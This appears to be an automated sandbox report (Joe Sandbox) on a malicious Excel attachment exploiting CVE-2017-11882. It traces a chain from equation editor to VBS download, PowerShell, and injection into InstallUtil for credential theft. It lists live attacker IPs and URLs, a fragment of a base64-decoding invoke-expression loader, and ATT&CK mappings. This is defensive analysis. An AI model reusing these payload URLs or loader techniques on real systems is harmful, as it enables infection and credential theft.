[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($elar));invoke-expression $alteastroJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3976, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.628206109.0000000002195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3976, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3976, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts231
                  Windows Management Instrumentation
                  211
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  24
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  211
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  34
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts11
                  Command and Scripting Interpreter
                  Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager531
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell
                  Login HookLogin Hook1
                  Install Root Certificate
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  14
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets261
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1566138 Sample: Comprobante de pago.xlam.xlsx Startdate: 01/12/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 17 other signatures 2->56 9 EXCEL.EXE 6 9 2->9         started        process3 file4 28 C:\Users\...\~$Comprobante de pago.xlam.xlsx, data 9->28 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 40 87.121.86.105, 49161, 49163, 80 SKATTV-ASBG Bulgaria 12->40 30 C:\...\mentallanguagefatalmemtallliz.vbs, Unicode 12->30 dropped 32 C:\Users\user\...\cumconstraints[1].vbs, Unicode 12->32 dropped 74 Office equation editor establishes network connection 12->74 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->76 17 wscript.exe 1 12->17         started        file7 signatures8 process9 signatures10 42 Suspicious powershell command line found 17->42 44 Wscript starts Powershell (via cmd or directly) 17->44 46 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->46 48 Suspicious execution chain found 17->48 20 powershell.exe 12 5 17->20         started        process11 dnsIp12 34 ip.1016.filemail.com 142.215.209.77, 443, 49162 HUMBER-COLLEGECA Canada 20->34 36 1016.filemail.com 20->36 58 Installs new ROOT certificates 20->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->60 62 Writes to foreign memory regions 20->62 64 Injects a PE file into a foreign processes 20->64 24 InstallUtil.exe 12 2 20->24         started        signatures13 process14 dnsIp15 38 ip-api.com 208.95.112.1, 49164, 80 TUT-ASUS United States 24->38 66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->66 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->68 70 Tries to steal Mail credentials (via file / registry access) 24->70 72 2 other signatures 24->72 signatures16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Comprobante de pago.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Comprobante de pago.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://87.121.86.105/cumconstraints.vbsssC:0%Avira URL Cloudsafe
                  http://87.121.86.105/cumconstraints.vbsj0%Avira URL Cloudsafe
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T0%Avira URL Cloudsafe
                  http://87.121.86.105/emmabigssss.txt0%Avira URL Cloudsafe
                  http://87.121.86.105/cumconstraints.vbs0%Avira URL Cloudsafe
                  https://1016.filemail.com0%Avira URL Cloudsafe
                  http://87.121.86.105/cumconstraints.vbsl?90%Avira URL Cloudsafe
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  208.95.112.1
                  truefalse
                    high
                    ip.1016.filemail.com
                    142.215.209.77
                    truetrue
                      unknown
                      1016.filemail.com
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://87.121.86.105/cumconstraints.vbstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://87.121.86.105/emmabigssss.txttrue
                        • Avira URL Cloud: safe
                        unknown
                        https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6ctrue
                        • Avira URL Cloud: safe
                        unknown
                        http://ip-api.com/line/?fields=hostingfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/powershell.exe, 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              high
                              http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.entrust.net03powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://87.121.86.105/cumconstraints.vbsssC:EQNEDT32.EXE, 00000002.00000002.470731109.000000000026F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://1016.filemail.compowershell.exe, 00000006.00000002.516444282.0000000002609000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tpowershell.exe, 00000006.00000002.516444282.0000000002609000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://87.121.86.105/cumconstraints.vbsl?9EQNEDT32.EXE, 00000002.00000002.470731109.000000000026F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ip-api.comInstallUtil.exe, 00000008.00000002.628206109.0000000002161000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.00000000021FC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002219000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://87.121.86.105/cumconstraints.vbsjEQNEDT32.EXE, 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.516444282.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002161000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.00000000021FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.215.209.77
                                                          ip.1016.filemail.comCanada
                                                          32156HUMBER-COLLEGECAtrue
                                                          208.95.112.1
                                                          ip-api.comUnited States
                                                          53334TUT-ASUSfalse
                                                          87.121.86.105
                                                          unknownBulgaria
                                                          34577SKATTV-ASBGtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1566138
                                                          Start date and time:2024-12-01 14:26:08 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 2s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Comprobante de pago.xlam.xlsx
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winXLSX@8/8@5/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 38
                                                          • Number of non-executed functions: 5
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .xlsx
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Active ActiveX Object
                                                          • Scroll down
                                                          • Close Viewer
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Comprobante de pago.xlam.xlsx
                                                          TimeTypeDescription
                                                          08:27:52API Interceptor71x Sleep call for process: EQNEDT32.EXE modified
                                                          08:27:55API Interceptor8x Sleep call for process: wscript.exe modified
                                                          08:27:56API Interceptor29x Sleep call for process: powershell.exe modified
                                                          08:28:16API Interceptor9x Sleep call for process: InstallUtil.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          142.215.209.77Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            208.95.112.1nbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                            • ip-api.com/json/
                                                            jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                            • ip-api.com/json/
                                                            Opera.exeGet hashmaliciousZTratBrowse
                                                            • ip-api.com/xml/?fields=countryCode,query
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • www.ip-api.com/line/?fields=16401
                                                            saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                            • ip-api.com/json/?fields=225545
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • www.ip-api.com/line/?fields=16401
                                                            file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                            • ip-api.com/json
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • ip-api.com/line/
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • ip-api.com/line/
                                                            file.exeGet hashmaliciousXWormBrowse
                                                            • ip-api.com/line/?fields=hosting
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ip.1016.filemail.comEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            0028BGL880-2024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 192.240.97.18
                                                            ip-api.comnbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                            • 208.95.112.1
                                                            jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                            • 208.95.112.1
                                                            Opera.exeGet hashmaliciousZTratBrowse
                                                            • 208.95.112.1
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                            • 208.95.112.1
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousXWormBrowse
                                                            • 208.95.112.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SKATTV-ASBGRHxJqGoGFB.exeGet hashmaliciousSalityBrowse
                                                            • 94.156.127.59
                                                            yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                            • 87.121.86.8
                                                            https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                            • 87.121.86.72
                                                            http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                            • 87.121.86.72
                                                            [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                                            • 87.121.86.72
                                                            o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                                            • 87.120.237.130
                                                            Payment Order #00004647.exeGet hashmaliciousXWormBrowse
                                                            • 87.121.86.8
                                                            https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqzGet hashmaliciousUnknownBrowse
                                                            • 87.121.86.72
                                                            tfSYi9zABT.exeGet hashmaliciousQuasarBrowse
                                                            • 87.121.86.32
                                                            file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 94.156.116.236
                                                            TUT-ASUSnbothjkd.exeGet hashmaliciousBlackshadesBrowse
                                                            • 208.95.112.1
                                                            jgesfyhjsefa.exeGet hashmaliciousBlackshadesBrowse
                                                            • 208.95.112.1
                                                            Opera.exeGet hashmaliciousZTratBrowse
                                                            • 208.95.112.1
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                            • 208.95.112.1
                                                            88851n80.exeGet hashmaliciousUnknownBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • 208.95.112.1
                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                            • 208.95.112.1
                                                            HUMBER-COLLEGECAEnquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.74
                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                            • 142.214.116.218
                                                            geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.78
                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.78
                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.78
                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                            • 142.215.209.78
                                                            asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 142.215.209.78
                                                            solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.78
                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 142.215.194.170
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            05af1f5ca1b87cc9cc9b25185115607dSwift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.77
                                                            26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
